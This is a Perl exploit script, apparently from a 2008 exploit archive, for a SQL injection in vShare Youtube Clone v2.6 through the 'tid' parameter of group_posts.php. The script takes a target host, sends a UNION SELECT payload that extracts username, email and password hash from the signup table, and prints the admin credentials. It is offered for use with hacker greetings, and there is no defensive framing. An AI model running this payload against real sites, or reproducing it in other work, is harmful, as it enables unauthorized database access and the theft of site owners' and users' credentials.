#!/usr/bin/perl # Coded by: Saime # vShare Youtube Clone v2.6 (group_posts.php tid) Remote SQL Injection # Author: Saime # URL: http://www.buyscripts.in # Price: $10.00 # Date: 8/05/2008 # Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed and everyone else I forgot! # Site: http://h4ck-y0u.org use LWP; $site = @ARGV[0]; $ua = LWP::UserAgent->new; my $injection = 'group_posts.php?tid=1+union+select+1,2,3,4,concat(username,0x3a,email,0x3a,pwd),6,7+from+signup+limit+0,1--'; if (@ARGV < 1) {&usage;} else { &exploit( ) } sub exploit ( ) { print "[+] Exploiting...\n"; $passres = $ua->get("http://$site/$injection"); $exploitcon = $passres->content; if ($exploitcon =~ m/Topic:<\/b>(.*)(.*):(.*):([a-f0-9]{32})<\/b>
/gmi){ $pass = $4; $admin = $2; $email = $3; print "[+] Admin Password: $pass\n"; print "[+] Admin Username: $admin\n"; print "[+] Admin Email: $email\n"; } else { print "[-] Unable To Get The Password...\n"; exit(0); } } sub usage ( ) { print "Usage: ./vshare.pl [host]\n"; print "Example: ./vshare.pl www.site.com\n"; exit(0); }